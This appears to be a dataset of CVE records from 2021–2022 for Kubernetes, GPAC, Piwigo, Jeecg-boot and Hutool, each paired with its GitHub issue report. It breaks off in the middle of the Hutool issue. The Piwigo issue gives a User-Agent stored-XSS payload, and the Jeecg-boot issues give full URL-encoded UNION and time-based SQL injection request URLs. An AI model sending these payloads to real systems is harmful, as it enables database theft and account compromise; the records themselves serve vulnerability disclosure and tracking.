"integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 0.7000000000000001, "impactScore": 1.4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/101493" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220225-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "7BE1AD99-F12A-4F6E-8EA5-578F32A1F15F", "versionEndExcluding": null, "versionEndIncluding": "1.18.18", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "34CCC198-AAA6-4DAE-94C4-B8CE55F621F7", "versionEndExcluding": null, "versionEndIncluding": "1.19.10", "versionStartExcluding": null, "versionStartIncluding": "1.19.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "6868B56F-DDBE-4CDA-9537-A0CAD3CDB1AB", "versionEndExcluding": null, "versionEndIncluding": "1.20.6", "versionStartExcluding": null, "versionStartIncluding": "1.20.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.21.0:*:*:*:*:*:*:*", "matchCriteriaId": "1A3D8AFD-1FB4-4F98-8522-E57A15DD00BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/101493
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: **Low** ([CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)) A security issue was discovered in Kubernetes where an authorized user may be able to access private networks on the Kubernetes control plane components. Kubernetes clusters are only affected if an untrusted user can create or modify Node objects and proxy to them, or an untrusted user can create or modify StorageClass objects and access KubeControllerManager logs. This issue has been rated Low (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N) and assigned CVE-2020-8562. As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to prevent proxied connections from accessing link-local or localhost networks when making user-driven connections to Services, Pods, Nodes, or StorageClass service providers. As part of this mitigation Kubernetes does a DNS name resolution check and validates that response IPs are not in the link-local (169.254.0.0/16) or localhost (127.0.0.0/8) range. Kubernetes then performs a second DNS resolution without validation for the actual connection. If a non-standard DNS server returns different non-cached responses, a user may be able to bypass the proxy IP restriction and access private networks on the control plane. ### Affected Versions: All versions of Kubernetes are affected ### Fixed Versions There is no fix for this issue at this time. ### Mitigations If this issue affects your clusters’ control planes, you can use dnsmasq for name resolution and configure the min-cache-ttl and neg-ttl parameters to a low non-zero value to enforce cached replies for proxied connections. ### Detection This issue is not known to be directly detectable, but proxied calls will appear in the Kubernetes API Audit log. Kubernetes will respond with “address not allowed” when the validation successfully prevents a connection. ### Acknowledgements This vulnerability was reported by Javier Provecho (Telefonica). /area security /kind bug /committee product-security /triage accepted
CVE-2020-8562: Bypass of Kubernetes API Server proxy TOCTOU
https://api.github.com/repos/kubernetes/kubernetes/issues/101493/comments
16
2021-04-26T19:18:04Z
2024-08-07T19:47:47Z
https://github.com/kubernetes/kubernetes/issues/101493
868,051,410
101,493
CVE-2022-24249
2022-02-04T19:15:08.100
A Null Pointer Dereference vulnerability exists in GPAC 1.1.0 via the xtra_box_write function in /box_code_base.c, which causes a Denial of Service. This vulnerability was fixed in commit 71f9871.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2081" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2081
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
**version info**: ``` MP4Box - GPAC version 1.1.0-DEV-rev1678-g92faba3-master GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/path_to_gpac/build --enable-debug --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_JP2 GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_LINUX_DVB ``` **poc**: [poc](https://github.com/dandanxu96/PoC/raw/main/gpac/gpac-xtra_box_write-null-pointer-dereference-poc) **command**: MP4Box -hint -out /dev/null $poc$ **crash**: ``` root@d8a714203f6e:/path_to_gpac/build/bin# ./MP4Box -hint -out /dev/null poc [iso file] Unknown box type t8Aak in parent moov [iso file] Box "UNKN" is larger than container box [iso file] Box "moov" size 211 (start 20) invalid (read 2209) [iso file] Box "nmhd" (start 359) has 8 extra bytes [iso file] Unknown box type dreu in parent dinf [iso file] Box "UNKN" is larger than container box [iso file] Missing dref box in dinf [iso file] Box "dinf" size 36 (start 379) invalid (read 64) [iso file] Unknown box type url in parent srpp [iso file] Unknown box type srpp in parent srpp [iso file] Box "UNKN" is larger than container box [iso file] Box "srpp" size 1814 (start 415) invalid (read 1854) [iso file] Unknown box type dre- in parent dinf [iso file] Box "UNKN" is larger than container box [iso file] Missing dref box in dinf [iso file] Box "dinf" size 36 (start 2229) invalid (read 64) [isom] invalid tag size in Xtra ! [isom] invalid tag size in Xtra ! [isom] not enough bytes in box Xtra: 46 left, reading 1836070003 (file isomedia/box_code_base.c, line 12754), skipping box [iso file] Box "Xtra" (start 2265) has 60 extra bytes [iso file] Unknown top-level box type 00000001 0.500 secs Interleaving utils/bitstream.c:1053:6: runtime error: null pointer passed as argument 2, which is declared to never be null ``` Here is the trace reported by debugging. We can see that the `memcpy` function is called on line 1053 of `utils/bitstream.c`, which will copy the contents of the second parameter `data` to the buffer pointed to by the first parameter. Unfortunately, in this trace the `data` is 0 (NULL), causing the program to crash. ``` In file: /path_to_gpac/src/utils/bitstream.c 1048 case GF_BITSTREAM_FILE_READ: 1049 case GF_BITSTREAM_FILE_WRITE: 1050 if (bs->cache_write) { 1051 //if block fits in our write cache, write it 1052 if (bs->buffer_written + nbBytes < bs->cache_write_size) { ► 1053 memcpy(bs->cache_write+bs->buffer_written, data, nbBytes); 1054 bs->buffer_written+=nbBytes; 1055 return nbBytes; 1056 } 1057 //otherwise flush cache and use file write 1058 bs_flush_write_cache(bs); pwndbg> backtrace #0 gf_bs_write_data (bs=0x60f00000dc90, data=0x0, nbBytes=1) at utils/bitstream.c:1053 #1 0x00007ff9797a8f82 in xtra_box_write (s=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_code_base.c:12814 #2 0x00007ff979816fb8 in gf_isom_box_write_listing (a=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_funcs.c:1834 #3 0x00007ff979817737 in gf_isom_box_write (a=0x60400000d590, bs=0x60f00000dc90) at isomedia/box_funcs.c:1883 #4 0x00007ff9798b432c in WriteInterleaved (mw=0x7ffd2b3ab870, bs=0x60f00000dc90, drift_inter=GF_TRUE) at isomedia/isom_store.c:1963 #5 0x00007ff9798bb1ca in WriteToFile (movie=0x616000009c80, for_fragments=GF_FALSE) at isomedia/isom_store.c:2549 #6 0x00007ff9798574d1 in gf_isom_write (movie=0x616000009c80) at isomedia/isom_read.c:600 #7 0x00007ff979857a3f in gf_isom_close (movie=0x616000009c80) at isomedia/isom_read.c:624 #8 0x00000000004413cc in mp4boxMain (argc=5, argv=0x7ffd2b3b0478) at main.c:6547 #9 0x00000000004416f2 in main (argc=5, argv=0x7ffd2b3b0478) at main.c:6601 #10 0x00007ff975d2e840 in __libc_start_main (main=0x4416d2 <main>, argc=5, argv=0x7ffd2b3b0478, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffd2b3b0468) at ../csu/libc-start.c:291 #11 0x000000000040fd09 in _start () ``` I tracked the null assignment of `data` in `isomedia/box_code_base.c`. `data2` is initialized to NULL in line 12743. When the value of `prop_size` is greater than 4 ( line 12764 ), the program will allocate a memory chunk to `data2` ( line 12769 ). Otherwise, `data2` will remain NULL and will be assigned to `tag->prop_value` in line 12777. In my crash, `prop_size` was set to 1 causing `tag->prop_value` to be NULL. The `tag` is then added to `ptr->tags` for subsequent access ( line 12779). https://github.com/gpac/gpac/blob/5d68ccd1fa4a5a76cf8db31a33cfb4a2fe2bd4ad/src/isomedia/box_code_base.c#L12736-L12786 When the program executes to `xtra_box_write`, it will get a `tag` from `ptr->tags` ( line 12801 ), and pass `tag->prop_value` to the second parameter of `gf_bs_write_data` ( line 12814 ), which eventually results in `data` being NULL. Although the program judges whether `tag->prop_value` is 0 in line 12805, it does not change the execution flow of the program and the value of `tag->prop_value`. https://github.com/gpac/gpac/blob/5d68ccd1fa4a5a76cf8db31a33cfb4a2fe2bd4ad/src/isomedia/box_code_base.c#L12791-L12817 Hope my analysis will help.
Null Pointer Dereference when dealing with XtraBox
https://api.github.com/repos/gpac/gpac/issues/2081/comments
0
2022-01-28T10:38:34Z
2022-01-28T16:00:46Z
https://github.com/gpac/gpac/issues/2081
1,117,248,312
2,081
CVE-2021-45357
2022-02-10T18:15:08.383
Cross Site Scripting (XSS) vulnerability exists in Piwigo 12.x via the pwg_activity function in include/functions.inc.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1582" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDC77171-712D-461F-83B8-953EB077F285", "versionEndExcluding": null, "versionEndIncluding": "12.1.0", "versionStartExcluding": null, "versionStartIncluding": "12.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1582
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
I found that piwigo Front-End can trigger xss,it means when the system administrator can trigger xss after logging into the backend Please see below for details of the analysis at first,We found a global filter in `include/common.inc.php` ![1](https://user-images.githubusercontent.com/56486273/146197712-471df1d4-2d90-4a14-aea1-9f25d12414bd.png) it just handle GET, POST, COOKIE,then we can think whether it can be broken through other parameters Then I found out that piwigo records the user's login and logout process Take the exit process as an example(The login is also the same),in `include/functions_user.inc.php` ```php function logout_user() { global $conf; trigger_notify('user_logout', @$_SESSION['pwg_uid']); pwg_activity('user', @$_SESSION['pwg_uid'], 'logout'); $_SESSION = array(); session_unset(); session_destroy(); setcookie(session_name(),'',0, ini_get('session.cookie_path'), ini_get('session.cookie_domain') ); setcookie($conf['remember_me_name'], '', 0, cookie_path(),ini_get('session.cookie_domain')); } ``` After that, let's see what the `pwg_activity` function does in `include/functions.inc.php` in this function,There is no filter parameter `$_SERVER['HTTP_USER_AGENT']` ![2](https://user-images.githubusercontent.com/56486273/146197730-c50fbedc-3493-4578-88f8-d133ff3d0679.png) then execute serialize and pwg_db_real_escape_string functions respectively ![3](https://user-images.githubusercontent.com/56486273/146197780-bb7b5034-9e65-4838-9dec-86f1d888e10b.png) look at function(pwg_db_real_escape_string),it just prevent sql injection ```php function pwg_db_real_escape_string($s) { return mysql_real_escape_string($s); } ``` then we register a user`yyds\yyds` ![4](https://user-images.githubusercontent.com/56486273/146197857-7db7d57f-4fe7-4571-a2aa-f055acf0c318.png) then we click `logout` ![5](https://user-images.githubusercontent.com/56486273/146197874-1fb0bf17-1a84-41d4-ae11-0b1e1442f860.png) then we just post like this,It is best to send more packages ![6](https://user-images.githubusercontent.com/56486273/146197891-df638a27-76c9-472f-97e3-bee9661abdd0.png) ```cmd url:http://test.y4tacker.top/identification.php User-Agent:"><script>alert(`Hacked By Y4tacker`)</script><" POST: username=yyds&password=yyds&redirect=%2F&login=submit ``` Next, after the system administrator has logged in,and visit `http://xxx/admin.php?page=user_activity` ![7](https://user-images.githubusercontent.com/56486273/146197909-92fd89ba-7136-49fc-a13d-e803f8ce8634.png) and look it ![8](https://user-images.githubusercontent.com/56486273/146197926-a858933b-02cb-410f-b992-36d5dd119292.png)
[Version <= 12.1.0]XSS vulnerability in the frontend
https://api.github.com/repos/Piwigo/Piwigo/issues/1582/comments
1
2021-12-15T13:48:11Z
2022-02-10T23:29:34Z
https://github.com/Piwigo/Piwigo/issues/1582
1,081,062,458
1,582
CVE-2022-22880
2022-02-16T22:15:07.677
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /jeecg-boot/sys/user/queryUserByDepId.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3347" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6D5281A-1578-443B-921C-0CE7B9B36BA4", "versionEndExcluding": null, "versionEndIncluding": "3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jeecgboot/jeecg-boot/issues/3347
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: <=3.0 ##### 问题描述: After testing, it is found that the code parameter of /jeecg-boot/sys/user/queryUserByDepId interface of jeecg-boot has SQL injection ##### 截图&代码: payload:/jeecg-boot/sys/user/queryUserByDepId?_t=1641263644&id=57197590443c44f083d42ae24ef26a2c&realname=%64%61%73%64%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%63%6f%6e%63%61%74%28%30%78%37%2c%69%66%6e%75%6c%6c%28%63%61%73%74%28%63%75%72%72%65%6e%74%5f%75%73%65%72%28%29%20%61%73%20%6e%63%68%61%72%29%2c%30%78%32%30%29%2c%30%78%37%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d ![1](https://user-images.githubusercontent.com/30540295/148018153-c08bda45-f7b0-4ccd-8418-f49448d803ac.png) The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 366 of ![2](https://user-images.githubusercontent.com/30540295/148018195-148932eb-445b-4d71-968a-d49cbd34c0d2.png) ![3](https://user-images.githubusercontent.com/30540295/148018255-92a04e68-b9c7-44d8-8421-8ba7df804c1f.png) ![4](https://user-images.githubusercontent.com/30540295/148018264-95d0b957-81c3-43f5-bd08-b88df2a30c66.png) #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - 描述过于简单或模糊,导致无法处理的,会被直接删掉;
SQL injection exists in /jeecg-boot/sys/user/queryUserByDepId
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3347/comments
2
2022-01-04T06:28:26Z
2022-01-18T02:56:58Z
https://github.com/jeecgboot/JeecgBoot/issues/3347
1,093,051,129
3,347
CVE-2022-22881
2022-02-16T22:15:07.723
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /sys/user/queryUserComponentData.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/3348" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:*:*:*:*:*:*:*:*", "matchCriteriaId": "C6D5281A-1578-443B-921C-0CE7B9B36BA4", "versionEndExcluding": null, "versionEndIncluding": "3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jeecgboot/jeecg-boot/issues/3348
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: jeecg-boot<=3.0 ##### 问题描述: After testing, it is found that the code parameter of /sys/user/queryUserComponentData interface of jeecg-boot has SQL injection Reuse https://github.com/jeecgboot/jeecg-boot After the source code of the project starts the project, click "custom component" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection ##### 截图&代码: payload: /jeecg-boot/sys/user/queryUserComponentData?_t=1641263644&pageNo=1&pageSize=10&departId=5159cde220114246b045e574adceafe9&realname=admin&username=%61%64%6d%69%6e%27%20%61%6e%64%20%28%73%65%6c%65%63%74%20%39%33%36%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%28%73%6c%65%65%70%28%35%29%29%29%6f%46%78%55%29%2d%2d%20 ![1](https://user-images.githubusercontent.com/30540295/148031223-f02bd99a-869f-4f17-bee3-9b04574ba894.png) or /jeecg-boot/sys/user/queryUserComponentData?_t=1641263644&pageNo=1&pageSize=10&departId=5159cde220114246b045e574adceafe9&realname=%61%64%6d%69%6e%27%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%43%4f%4e%43%41%54%28%30%78%37%31%36%61%37%30%36%32%37%31%2c%30%78%37%37%34%63%37%30%34%39%34%61%34%39%35%37%34%64%35%36%35%39%36%63%36%39%35%30%34%66%34%65%35%34%36%32%36%33%35%39%34%35%36%63%36%36%35%61%35%36%35%37%34%38%35%34%35%34%37%61%36%31%37%37%35%37%37%30%34%33%36%39%34%31%36%64%34%61%34%31%36%37%2c%30%78%37%31%36%62%37%31%37%31%37%31%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d0&username=zz12 ![2](https://user-images.githubusercontent.com/30540295/148031259-3c3c6ecd-9164-40e3-8fee-fc19d55815b3.png) Using sqlmap ![3](https://user-images.githubusercontent.com/30540295/148031288-015466cf-e248-4f70-a1cb-ae5b6b0a1a18.png) The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 402 of ![4](https://user-images.githubusercontent.com/30540295/148031292-8732ab0b-f8dd-4c9e-9b18-18b7c4a908ff.png) ![5](https://user-images.githubusercontent.com/30540295/148031297-995a7e16-1296-4bbb-a62c-1393b712d84f.png) ![6](https://user-images.githubusercontent.com/30540295/148031303-01b8d4a1-fa94-45b9-803b-5dc595396793.png) #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能; - 描述过于简单或模糊,导致无法处理的,会被直接删掉;
SQL injection exists in /sys/user/queryUserComponentData
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3348/comments
3
2022-01-04T08:36:23Z
2022-02-21T13:29:22Z
https://github.com/jeecgboot/JeecgBoot/issues/3348
1,093,125,235
3,348
CVE-2022-22885
2022-02-16T22:15:07.773
Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://apidoc.gitee.com/dromara/hutool/cn/hutool/http/ssl/DefaultSSLInfo.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dromara/hutool/issues/2042" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hutool:hutool:5.7.18:*:*:*:*:*:*:*", "matchCriteriaId": "4C9E9670-0982-49B3-A11D-D4F294D3B8CD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/dromara/hutool/issues/2042
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dromara", "hutool" ]
### 版本情况 JDK版本: corretto_8_312 hutool版本: 5.7.18(请确保最新尝试是否还有问题) ### 问题描述(包括截图) 注意到 hutool HttpUtil 中 HttpConnection#setHttpsInfo 默认传入的 HostnameVerifier 是 DefaultSSLInfo.TRUST_ANY_HOSTNAME_VERIFIER,即: ```java package cn.hutool.http.ssl; import javax.net.ssl.HostnameVerifier; import javax.net.ssl.SSLSession; public class TrustAnyHostnameVerifier implements HostnameVerifier { public TrustAnyHostnameVerifier() { } public boolean verify(String hostname, SSLSession session) { return true; } } ``` 查看 javax.net.ssl.HttpsURLConnection.DefaultHostnameVerifier 代码如下: ```java /** * <code>HostnameVerifier</code> provides a callback mechanism so that * implementers of this interface can supply a policy for * handling the case where the host to connect to and * the server name from the certificate mismatch. * <p> * The default implementation will deny such connections. */ private static HostnameVerifier defaultHostnameVerifier = new DefaultHostnameVerifier(); /* * The initial default <code>HostnameVerifier</code>. Should be * updated for another other type of <code>HostnameVerifier</code> * that are created. */ private static class DefaultHostnameVerifier implements HostnameVerifier { @Override public boolean verify(String hostname, SSLSession session) { return false; } } /** * The <code>hostnameVerifier</code> for this object. */ protected HostnameVerifier hostnameVerifier = defaultHostnameVerifier; ``` 从 doc 看到 HostnameVerifier 是一种 fallback 机制,当要连接的 host 与服务端证书 server name 不匹配时才有作用。并且 javax.net.ssl.HttpsURLConnection 的默认机制是这时候拒绝此类请求。而 hutool 则默认放行所有这类请求。 如果调用 cn.hutool.http.HttpRequest 时手动传入上面的 javax.net.ssl.HttpsURLConnection.DefaultHostnameVerifier: ```java String result1 = HttpRequest.get("https://www.baidu.com") 